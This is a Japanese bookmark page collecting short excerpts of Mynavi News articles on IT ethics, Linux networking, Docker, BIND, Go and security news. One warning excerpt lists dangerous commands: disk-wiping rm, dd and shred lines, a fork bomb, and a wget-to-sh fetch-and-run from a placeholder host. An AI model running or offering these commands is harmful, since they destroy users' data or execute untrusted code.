タグ

ブックマーク / news.mynavi.jp (52)

  • コンピューティングのプロが守るべき「倫理規定」(3) コンピューティングのプロに求められる責任

    2 プロフェッショナルの責任 【2.1】仕事のプロセスと成果の両方に高い品質を達成するように努力すること 【2.2】プロフェッショナルとしての能力、行動、倫理的な行動に高い基準を維持すること 【2.3】プロフェッショナルの仕事に付属する既存のルールを理解し、それを尊重すること コンピューティングのプロフェッショナルは、既存のルールなどを尊重することが求められるが、そのルールが不十分な倫理基盤に基づいていたり、害を及ぼしたりする可能性を持つなど、倫理的に正しくないと判断される場合でも、ルールを破る前に、既存のチャネルを通してルールの改変を迫るべきである。ルールが倫理的でない、あるいはその他の理由で、ルールを破った場合、既存のルール違反に問われる可能性があることを考慮すべきである。 【2.4】適切なプロフェッショナルの評価(Review)を受け入れ、また、与えること 【2.5】コンピュータシス

    コンピューティングのプロが守るべき「倫理規定」(3) コンピューティングのプロに求められる責任
  • Linuxネットワークコマンド新旧まとめ

    ipコマンドの実行例 / Ubuntu 18.04 LTS これまでLinuxディストリビューションではUNIX系オペレーティングシステムでよく使われているコマンドと、Linux独自のネットワーク系コマンドが混在したような状態になっていた。最近のLinuxディストリビューションではこうしたコマンドをipコマンドに一化する取り組みを続けている。 ipコマンドにはいくつものサブコマンドが用意されており、これまで個別のコマンドで実行していた処理をipコマンドのもとに集約するような作りになっている。なお、ipコマンドはLinux系に特有のコマンドで、他のUNIX系オペレーティングシステムでは使うことができない。記事では、非推奨になったコマンドを今後使うことはお薦めできないとしている。

    Linuxネットワークコマンド新旧まとめ
  • マクロを使わないでマルウェア感染を広める新しいテクニックが発見

    Malwarebytesは7月2日(米国時間)、「New macro-less technique to distribute malware - Malwarebytes Labs|Malwarebytes Labs」において、米セキュリティベンダーのSpecterOpsのセキュリティリサーチャーであるMatt Nelson氏が、Microsoft Officeのドキュメントにおいて、マクロを悪用せずにマルウェアの感染を行える方法を発見したと伝えた。 Windows 10特有のファイルに拡張子が「.SettingContent.ms」というものがある。これはフォーマットとしてはXML形式のファイルで、コントロールパネルに対してショートカットを作成する目的で使われている。問題はこのファイルのDeepLink要素に任意のコードを書くことが可能という点にあり、ここに指定したコードがユーザーに許

    マクロを使わないでマルウェア感染を広める新しいテクニックが発見
  • Microsoft、OSSのWebサイト解析ツール「SONAR」公開

    Microsoftは10月25日(現地時間)、「sonar: Linting the web forward - Microsoft Edge Dev BlogMicrosoft Edge Dev Blog」において、Webページの解析を行うためのツール「SONAR」を発表した。オンラインツールとしてサイトを解析できるほか、コマンドラインツールとしてローカルで利用することもできる。最新のルールセットが使われており、今度も開発への投資が表明されているなど、Webページ解析ツールとしての活用が期待できる。 Web技術の発展は速く、Webページを構成するコンテンツやコード、スタイルは複雑化している。構築されたWebページが規約に準拠しているかをエンジニアが自らの知識のみで判定することは難しい。SONARのようなツールを利用することにより、すでに構築したWebページの内容が規約にそった適切なもので

    Microsoft、OSSのWebサイト解析ツール「SONAR」公開
  • ゼロからはじめるDocker(1) Dockerとは?

    クラウドサービスは、サーバやネットワークなどのインフラを、どこからでも、簡便に、必要に応じて利用でき、かつ品質が高いことから、個人のみならず企業までもが活用している。 クラウドサービスは、Iaas、Paas、Saasのサービスモデルで提供されており、最近ではサービスモデルのひとつであるIaasをより効率良く活用するために、必要最小限のリソースでアプリケーションを実行できる環境を提供するコンテナ型の仮想サービスが注目を集めている。 そこで、コンテナ型の仮想サービスを理解する上で、代表的なソフトウェアであるDockerについて説明する。 「Docker」とは、Docker Incが提供するコンテナ型の仮想化環境を構成、管理するソフトウェアである。コンテナ型の特徴として、必要最小限のアプリケーション実行環境(コンテナ)をソフトウェアとして提供できるところにある。 仮想化環境は、コンピュータ上に仮

    ゼロからはじめるDocker(1) Dockerとは?
  • いまさら聞けないスイッチの基礎(17) LLDPとIGMPスヌーピング

    連載は、ネットワーク構築に必須となるLANスイッチについて、動作や仕組みを解説しながら実際の設定例を示し、ネットワークを身近に感じていただける事を目的としています。 第五回までに、LANスイッチの概要や種類、IEEE802.1X認証等について解説しました。第六回となる稿では、接続先の情報を簡単に取得できるLLDP(Link Layer Discovery Protocol)と、動画等を参照する時に使うIGMP(Internet Group Management Protocol) スヌーピングについて解説します。 1.LLDP LANスイッチ間が、どのポートで接続されているか確認したいとします。接続しているケーブルをたどれば確認できますが、距離が離れていたり床下に配線されていたりすると困難です。LLDPを利用すると、どのポートにどのホスト名のLANスイッチが接続されているのか簡単に確認

    いまさら聞けないスイッチの基礎(17) LLDPとIGMPスヌーピング
  • ISC、BIND 9におけるパフォーマンス改善の取り組み解説

    Internet Systems Consortiumは8月4日、「BIND9 Performance History|Internet Systems Consortium」において、BIND 9における性能モニタリングの取り組みを紹介した。過去にパフォーマンス改善をうたって盛り込んだ改善が性能の劣化につながったことが何度かあったため、こうした事態を回避できるように取り組みを進めていると説明している。 BINDは世界中で利用されているソフトウェアで、インターネットにおける名前解決に関して重要な役割を担っている。 リリースごとのパフォーマンスの違いを比べると、BIND 9.9系はBIND 9.9.6でパフォーマンスが劣化しており、BIND 9.10系ではBIND 9.10.0のパフォーマンスが低い。パフォーマンスを改善するという目的で機能が取り込まれたバージョンだが、Internet Sy

    ISC、BIND 9におけるパフォーマンス改善の取り組み解説
  • 【連載】誰も教えてくれない「ネットワークセキュリティ」 [2] 見えない自社ネットワーク構成を見えるようにする

    どれほどセキュリティ対策を施していても、社内ネットワークに存在するべきでない端末が繋がっていたとしたら、外部からの不正侵入や、内部からの情報漏えいといったリスクを残してしまいます。そこで今回は、自社ネットワークの「当の姿を可視化する方法」を解説します。 「PC管理台帳」だけでは不十分 可視化しなくても「社内デバイスはExcelで作った『PC管理台帳』で管理しているから問題ない」という方がいらっしゃるかもしれません。 こうした台帳管理では、 ■どんなデバイスを、いつ、何台導入したか ■レンタルリース期間や、コストがいくらかかっているか ■導入当初はどの部署の、誰に割り当てられていたか などの項目を明確にできます。これに加えて、定期的な実地棚卸によって、その時点における台帳とのい違いを見つけ、修正が可能になります。 しかし、管理者の眼が行き届かないところで、次のようなことが起きていないでし

    【連載】誰も教えてくれない「ネットワークセキュリティ」 [2] 見えない自社ネットワーク構成を見えるようにする
  • Google、プログラミング言語「Go 2」開発計画発表

    Goプロジェクトチームは7月13日(米国時間)、「Toward Go 2 - The Go Blog」において、次期メジャーアップグレードバージョンとなる「Go 2」へ向けた基計画を発表した。どのような問題を解決することを目指してGo 2へ向かっていくのか、実際にどのような工程でGo 2のリリースへと進めるのかを説明している。 Goは登場直後は大きな話題を集めたが、その後あまり注目されなくなってしまった。しかし、Goは確実に開発を重ね、Googleをはじめいくつものプロジェクトで採用されていった。現在では、企業システムの開発においても重要なプログラミング言語になりつつあり、特に2016年後半辺りから露出を増やしている。今後も利用の増加が見込めるプログラミング言語とみられてる。 Goプロジェクトチームはこれまでの開発経験や運用経験から問題点を洗い出し、Go 2で解決したい項目として挙げてい

    Google、プログラミング言語「Go 2」開発計画発表
  • 誰も教えてくれない「ネットワークセキュリティ」(1) 今の脅威がひと目で分かるセキュリティ可視化サイト8選

    セキュリティ対策を検討する上で最初に起こすべき行動は、現状のシステム環境を正確に把握することです。ただし、社内ネットワークの環境を調べるために手元のログファイルをただ眺めるだけでは、課題を見つけ出すことができません。この連載ではネットワークセキュリティ脅威の「可視化」をテーマに、端末管理やUTM/IPS、エンドポイント、Webやメール、脆弱性などの検知・検査ログを見える化し、有益な情報を得るための方法を解説します。 改めて「可視化」とは? 題へ入る前に、「可視化」のトレーニングをやってみましょう。仕事/プライベートを問わず、「インターネット」は欠かすことのできないインフラとなっていますが、、「いつ頃から」「どれほどの企業が」利用しているのでしょうか。 これを”可視化”する手立ては総務省 統計局 e-Stat 政府統計の総合窓口にあります。国勢調査をはじめ、産業、文化、気象などのあらゆる政

    誰も教えてくれない「ネットワークセキュリティ」(1) 今の脅威がひと目で分かるセキュリティ可視化サイト8選
  • マルウェア「Mirai」よりも強力な亜種が登場 - 大学を54時間攻撃

    Threatpostに3月30日(米国時間)に掲載された記事「New Mirai Variant Roars into Action With 54 Hour DDoS Attacks|Threatpost|The first stop for security news」が、先月マルウェア「Mirai」の亜種と見られるマルウェアが54時間という長時間にわたって米国のカレッジに対してサイバー攻撃を実施したと伝えた。 この攻撃については、セキュリティベンダーのImpervaが同社のブログで伝えている。このマルウェアはMiraiよりも強力とされており、今後の活動に注意が必要。 Miraiは昨年10月に猛威を振るったマルウェア。MiraiはWebカメラやホームルータなどのIoTデバイスに感染して大規模なボットネットを構築。サイバー攻撃の実施者はこのボットネットを使って大規模な分散サービス妨害攻撃

    マルウェア「Mirai」よりも強力な亜種が登場 - 大学を54時間攻撃
  • コンピュータアーキテクチャの話(368) GCNアーキテクチャにおける1次データキャッシュの構造

    L1データキャッシュ AMDのGCNアーキテクチャのGPUは読み書き可能な16KBの容量の1次データキャッシュを持っている。NVIDIAのGPUは1次データキャッシュの位置づけが世代ごとに変り、最適化がやり難いが、GCNアーキテクチャの1次データキャッシュは読み書き可能なキャッシュという位置づけが一貫しているのは立派である。 GCNアーキテクチャのGPUの1次データキャッシュの構造を図8.8に示す。1次データキャッシュは、容量が16KBで、ラインサイズは64B、4wayのセットアソシアティブで、LRU入れ替えを行う。 1次データキャッシュへの書き込みを行う場合、CPUでは、キャッシュコヒーレンシプロトコルを使って、各コアの1次データキャッシュ間の内容に矛盾が生じないようにするのであるが、GPUの場合はWavefrontごとに64個の異なるアドレスに書き込みが行われる可能性がある。このため、

    コンピュータアーキテクチャの話(368) GCNアーキテクチャにおける1次データキャッシュの構造
  • トレンドマイクロの機械学習型検索の仕組み - 法人向けセキュリティ対策ソフト「XGen」に搭載

    トレンドマイクロは、AI(人工知能)技術を応用した機械学習型検索機能を持つ、新たな総合セキュリティ対策ソフトのウイルスバスターコーポレートエディション XG(以下、ウイルスバスター XGと略記)を発表した。製品名には、従来はバージョンナンバーである「11」がついていたが、今回から「XG」となった。このXGの正式名は「XGen(エクスジェン)」で、従来の成熟した技術と新しいAI技術の組み合わせによる新しいセキュリティアプローチを意味する。 発表会当日、同じ会場にて、Trend Micro DIRECTIONが開催されていたが、その基調講演でCEOのエバ・チェン氏もXGenのXを強調する講演を行った。

    トレンドマイクロの機械学習型検索の仕組み - 法人向けセキュリティ対策ソフト「XGen」に搭載
  • Microsoft、国別のマルウェアの傾向を分析 - Microsoft Secure Blog

    10月24日(現地時間)、Microsoftは定期的に発刊している「Security Intelligence Report」から、国別のサイバーセキュリティ脅威状況を公式ブログで発信した。 例えば2015年下半期はロシアとブラジルが世界平均の約3倍にまでおよんでいる。ロシアでは「Win32/Peals」「Win32/Skeeyah」「Win32/Dynamer」「Win32/Spursint」、ブラジルでは、「Win32/Sventore」「Win32/Banload」といったマルウェアが猛威を振るった。その他の特徴として、Microsoftは次のように説明している。 ・フランスおよびイタリアの両国では、「Win32/SupTab」「Win32/Diplugem」によるWebブラウザーの改ざんが発生している。 ・ロシアは「Win32/Peals」「Win32/Skeeyah」「Win32

    Microsoft、国別のマルウェアの傾向を分析 - Microsoft Secure Blog
  • これから取り組むサイバーセキュリティ対策の基礎知識(1) 知っておきたいWebサイトのセキュリティ

    サイバー攻撃による被害が珍しくなくなった昨今、情報漏えいの事件をニュースのヘッドラインで目にすることも多くなりました。セキュリティ被害の増加はもちろんのこと、格的なIoT社会の到来に向けたセキュリティ需要や、2015年12月に経済産業省からサイバーセキュリティ経営ガイドラインが公表されたことも、サイバーセキュリティの取り組みを加速させています。今やセキュリティ対策は企業経営にとって非常に重要な位置づけとなっています。 とはいえセキュリティの分野は極めて専門性が高く、また日進月歩の世界ですので情報のキャッチアップも一苦労です。これらの背景を踏まえて連載では、これからセキュリティ対策に取り組む企業へ向けて、担当者が最低限押さえておきたい基礎知識を取り上げたいと思います。第1回は、Webサイトのセキュリティについてお伝えします。 攻撃手法は進化しても、押さえるポイントは3つ サイバー攻撃と聞

    これから取り組むサイバーセキュリティ対策の基礎知識(1) 知っておきたいWebサイトのセキュリティ
  • 400行以下のオペレーティングシステム登場 | マイナビニュース

    GitHubに400行以下で構成されたオペレーティングシステムが登録された。オペレーティングシステムは「resume_operating_system」と呼ばれている。開発の動機や仕組みなどに関する説明は「My resume in an Operating system」にまとまっている。オペレーティングシステムの基構造を理解する際に役に立つ。 このオペレーティングシステムはMathieu Passenaud氏が学生時代に作成したオペレーティングシステムの基礎実装をまとめたもの。開発者の経歴を表示するだけという目的で作られた趣味的な取り組みの成果物であるため、明確に名称がついていない。GitHubに登録した名前が「resume_operating_system(経歴オペレーティングシステム)」であるため、この名称で呼ばれている。 resume_operating_systemではテキスト

    400行以下のオペレーティングシステム登場 | マイナビニュース
  • 実行してはいけない危険なLinuxコマンド10選 | マイナビニュース

    fossBytesに8月20日(米国時間)に掲載された記事「10 Most Dangerous Linux Commands You Should Never Run」が、実行すると修復することが不可能な損害を与えかねないLinuxコマンド、または修復できてもひどいことになるLinuxkコマンド10選を伝えた。 紹介されているコマンドは次のとおり。 rm -Rf / shred /dev/sda dd if=/dev/random of=/dev/sda mkfs.ext4 /dev/sda1 mv / /dev/null :(){:|:&};: wget http://unknownsource.com/possiblydangerous.sh -O- | sh gunzip untrusted.gz command > file.conf ^mistake^correction UNI

    実行してはいけない危険なLinuxコマンド10選 | マイナビニュース
  • 仮想デスクトップの設計構築の落とし穴(11) [設計フェーズの落とし穴] 仮想化すればインターネット分離は簡単?

    最近「Web分離」「インターネット分離」という言葉をよく耳にする。2015年に日年金機構において標的型攻撃による情報漏洩が発生してから、企業の情報漏洩対策として仮想アプリケーションや仮想デスクトップを利用したインターネット分離が検討されることが多くなった。 どの企業においても、社内からインターネット接続を行う場合はファイアウォールで防御したり、プロキシーサーバを経由しないとインターネットが使えなかったりという対応はごく一般的だが、インターネット分離環境においては、企業内端末からは直接インターネットにアクセスさせない点が大きく異なる。 しかし、単にインターネット分離環境を導入するだけではセキュリティ対策として十分ではない。今回は、仮想化技術を活用したインターネット分離の潮流と標的型攻撃への応用について説明しよう。 なお、「Web分離」は厳密にhttpやhttpsというプロトコルだけを分離す

    仮想デスクトップの設計構築の落とし穴(11) [設計フェーズの落とし穴] 仮想化すればインターネット分離は簡単?
  • C言語1000行以下で開発されたエディタ「Kilo」

    このほど、「antirez / kilo|GitHub」において、Salvatore Sanfilippo氏によってC言語を使い1000行以下のソースコードで開発されたエディタ「Kilo」が公開された。2条項BSDライセンスの下でオープンソース・ソフトウェアとして公開されている。ほかのライブラリに依存することなく開発されており、作業を始めてから数時間ほどで開発されたと説明がある。C言語による学習素材やエディタ開発のベースソースコードとして利用できる。 Kiloはclocを使ったカウントでコメントや空行を除いた行数が956行とされており、1000行を下回っている。開発にはcursesライブラリといった基的なライブラリも使われておらず、VT100の基的なエスケープシーケンスを使って開発されている。エディタにおける保存や終了といった操作には次のキーが割り当てられている。 Ctrl-S 保存

    C言語1000行以下で開発されたエディタ「Kilo」
  • DDoS攻撃もサービス化へ! 被害を受けたSBT 辻氏が語る対策法 - A10 Forum 2016

    4月7日、東京都港区の東京コンファレンスセンター・品川にて、A10ネットワークス主催の年次カンファレンス「A10 Forum 2016 ~サイバー攻撃や情報漏洩のリスクに備える、ネットワーク対策~」が開催された。 カンファレンスには、米A10 Networks 創業者兼CEOのLee Chen氏らが登壇。ADC(Application Delivery Controller)分野で高いシェアを誇る同社だが、ここ数年はネットワークセキュリティ製品を強化していることなどを紹介したうえで、専用アプライアンス「aGalaxy」によりさまざまなネットワーク機器を集中管理していくことを明かした。 また、基調講演には、ソフトバンク・テクノロジーのシニアセキュリティエバンジェリスト 辻 伸弘氏が招かれ、A10ネットワークスでも対策製品の開発・販売を強化しているDDoS/DoS攻撃に関して、セキュリティの専

    DDoS攻撃もサービス化へ! 被害を受けたSBT 辻氏が語る対策法 - A10 Forum 2016